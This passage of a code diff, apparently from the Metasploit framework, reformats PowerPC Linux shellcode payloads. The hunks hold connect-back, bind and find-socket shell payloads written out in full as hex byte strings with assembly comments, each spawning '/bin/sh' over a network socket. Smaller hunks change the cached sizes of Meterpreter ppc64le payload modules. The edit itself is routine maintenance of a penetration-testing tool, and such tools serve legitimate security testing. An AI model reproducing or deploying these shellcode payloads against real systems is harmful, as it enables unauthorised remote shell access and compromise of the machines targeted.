"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" + # li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" + # mr r21,r1 #
|
||||
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
|
||||
"\x96\xa1\xff\xfc" + # stwu r21,-4(r1) #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" + # mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <cntsockcode+108> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode+132> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,60 +32,60 @@ module MetasploitModule
|
|||
'LPORT' => [ 58, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" +# lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" +# mr r22,r1 #
|
||||
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
|
||||
"\xfa\xc1\xff\xf9" +# stdu r22,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x75\x1b\x78" +# mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" +# mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <bndsockcode64+148> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode64+172> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" + # lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" + # mr r22,r1 #
|
||||
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
|
||||
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x75\x1b\x78" + # mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" + # mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,47 +32,47 @@ module MetasploitModule
|
|||
'CPORT' => [ 86, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" +# addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x09" +# addi r1,r1,-503 #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" +# bne+ <fndsockcode64+40> #
|
||||
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" +# mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <fndsockcode64+96> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode64+120> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" + # addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
|
||||
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" + # mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -33,50 +33,50 @@ module MetasploitModule
|
|||
'LPORT' => [ 62, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" +# li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" +# mr r21,r1 #
|
||||
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
|
||||
"\xfa\xa1\xff\xf9" +# stdu r21,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" +# mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <cntsockcode64+108> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode64+132> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" + # li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" + # mr r21,r1 #
|
||||
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
|
||||
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" + # mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1079888
|
||||
CachedSize = 1079936
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1079888
|
||||
CachedSize = 1079936
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue